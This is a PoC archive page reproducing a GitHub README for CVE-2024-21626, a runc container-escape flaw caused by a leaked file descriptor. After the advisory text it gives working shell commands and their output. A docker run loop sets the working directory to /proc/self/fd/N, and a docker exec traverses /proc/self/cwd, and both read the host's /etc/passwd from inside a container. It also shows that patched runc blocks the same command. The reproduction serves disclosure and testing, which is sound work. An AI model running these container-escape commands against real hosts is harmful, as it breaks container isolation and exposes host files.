Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2024-21626 PoC — runc container breakout through process.cwd trickery and leaked fds

Source
https://github.com/zhangguanzhang/CVE-2024-21626
Associated Vulnerability
Title:runc container breakout through process.cwd trickery and leaked fds (CVE-2024-21626)
Description:runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.
Readme
## about

Steps to reproduce

ensure kernal >= `(5.4,4.19,..)` and there is `openat2` in `/proc/kallsyms`. `v1.0.0-rc93<= runc <=1.1.11`

```
$ grep openat2 /proc/kallsyms
ffffffffa64290d0 T __pfx___audit_openat2_how
ffffffffa64290e0 T __audit_openat2_how
ffffffffa666de90 t __pfx_do_sys_openat2
ffffffffa666dea0 t do_sys_openat2
ffffffffa666e020 t __pfx___do_sys_openat2
ffffffffa666e030 t __do_sys_openat2
ffffffffa666e150 T __pfx___x64_sys_openat2
ffffffffa666e160 T __x64_sys_openat2
ffffffffa666e190 T __pfx___ia32_sys_openat2
ffffffffa666e1a0 T __ia32_sys_openat2
ffffffffa69871e0 T __pfx_io_openat2_prep
ffffffffa69871f0 T io_openat2_prep
ffffffffa6987280 T __pfx_io_openat2
ffffffffa6987290 T io_openat2
ffffffffa863d1e0 d event_exit__openat2
ffffffffa863d260 d event_enter__openat2
ffffffffa863d2e0 d __syscall_meta__openat2
ffffffffa863d320 d args__openat2
ffffffffa863d340 d types__openat2
ffffffffa8affb48 d __event_exit__openat2
ffffffffa8affb50 d __event_enter__openat2
ffffffffa8b02b18 d __p_syscall_meta__openat2
ffffffffa8b056f0 d _eil_addr___ia32_sys_openat2
ffffffffa8b05700 d _eil_addr___x64_sys_openat2
```

get host file:

```
$ tail -n1 /etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line ubuntu tail -n1 ../../../../../etc/passwd |& grep -Ev Error ; done
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

get fd number

```
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line -tid --name s-$line ubuntu   ; done
$ docker ps -a | grep -P 's-\d$'
c171e8ac9a1a  ubuntu    "bash"  About a minute ago   Up About a minute  s-7
```

number is 7 on my machine, and exec in old container:

```
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

after replace runc:

```
$ cp runc.amd64 /usr/bin/runc
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
```
File Snapshot

 [4.0K]  /data/pocs/26d32e62e74dc9542911364e1d0f937d14159d31
└── [2.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →